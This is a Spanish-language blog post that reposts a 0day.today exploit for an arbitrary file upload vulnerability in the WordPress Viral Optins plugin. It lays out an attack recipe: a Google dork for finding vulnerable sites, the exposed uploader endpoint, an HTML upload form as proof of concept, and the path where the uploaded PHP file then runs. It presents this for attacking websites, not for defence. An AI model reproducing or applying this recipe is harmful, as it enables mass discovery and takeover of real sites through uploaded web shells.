sábado, 24 de junio de 2017

Home » » WordPress Viral Optins Plugins - Arbitrary File Upload Vulnerability

WordPress Viral Optins Plugins - Arbitrary File Upload Vulnerability

No hay comentarios



Aplicando PoC:







Código: 
# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/

2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php

Indonesian h4x0r.

#  0day.today [2017-06-23]  #
Share:

0 comentarios:

Publicar un comentario

  • Ataques RFI
    Esta  vulnerabilidad  solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros s...
  • Nessus Scanner de Vulnerabilidades
    Bueno comenzaremos definiendo que es Nessus: Nessus es un programa que escanea vulnerabilidades de diversos Sistemas Operativos (Windows...
  • Webslayer - Web application bruteforcer
    WebSlayer es una herramienta diseñada para ataques de fuerza bruta aplicaciones Web, que puede ser utilizado para la búsqueda de recursos ...
  • WebVulnScan Scanner + Prueba Online
    WebVulScan es un escáner de vulnerabilidades de aplicaciones web. Se trata de una aplicación en sí misma web escrito en PHP y se puede ut...
  • Fern Wifi Cracker - Wireless Penetration Testing
    Bueno aunque esta Herramienta es bastante conocida, no esta demas dejarla para los que no cuentan con backtrack en el cual  viene ins...

FOLLOWME


Translate

Followers